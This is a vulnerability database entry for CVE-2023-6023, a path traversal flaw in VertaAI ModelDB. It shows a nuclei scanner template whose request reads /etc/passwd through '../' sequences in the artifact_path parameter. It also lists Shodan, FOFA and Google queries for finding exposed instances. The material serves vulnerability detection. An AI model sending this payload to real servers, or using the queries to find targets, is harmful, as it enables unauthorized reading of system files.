Lucene search
K

VertaAI ModelDB - Path Traversal

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

VertaAI ModelDB Path Traversal vulnerability, allowing unauthorized access to sensitive files, severity: hig

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6023
12 Nov 202400:00
circl
CNNVD
ModelDB Security Vulnerabilities
16 Nov 202300:00
cnnvd
CVE
CVE-2023-6023
16 Nov 202316:03
cve
Cvelist
CVE-2023-6023 ModelDB Local File Include
16 Nov 202316:03
cvelist
NVD
CVE-2023-6023
16 Nov 202316:15
nvd
OSV
CVE-2023-6023
16 Nov 202316:15
osv
Prion
Code injection
16 Nov 202316:15
prion
RedhatCVE
CVE-2023-6023
23 May 202502:05
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2023-6023
11 Sep 202400:00
vulncheck_kev
id: CVE-2023-6023

info:
  name: VertaAI ModelDB - Path Traversal
  author: m0ck3d,cookiehanhoan
  severity: high
  description: |
    The endpoint "/api/v1/artifact/getArtifact?artifact_path=" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.
  impact: |
    Attackers can potentially exploit this vulnerability to perform a relative path traversal attack, which can lead to unauthorized access to sensitive local files on the server. As an impact it is known to affect confidentiality.
  remediation: Restrict access to the web application
  reference:
    - https://huntr.com/bounties/644ab868-db6d-4685-ab35-1a897632d2ca/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6023
    cwe-id: CWE-22,CWE-29
    epss-score: 0.02999
    epss-percentile: 0.85718
    cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vertaai
    product: modeldb
    shodan-query:
      - http.favicon.hash:-2097033750
      - http.title:"verta ai"
    fofa-query:
      - icon_hash=-2097033750
      - title="verta ai"
    google-query: intitle:"verta ai"
    zoomeye-query: title="Verta AI"
  tags: cve,cve2023,lfi,modeldb,vertaai,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename="
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c4ea30a083739e4adfcbcbe4eaf1a8094bfa04300e47225dec09c224cdb21ed50220064ca3fdac917b14cc7a4fe773fc23bd7a6201fa402bac70029ef5e48cd78517:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
CVSS 38.6
EPSS0.02999
34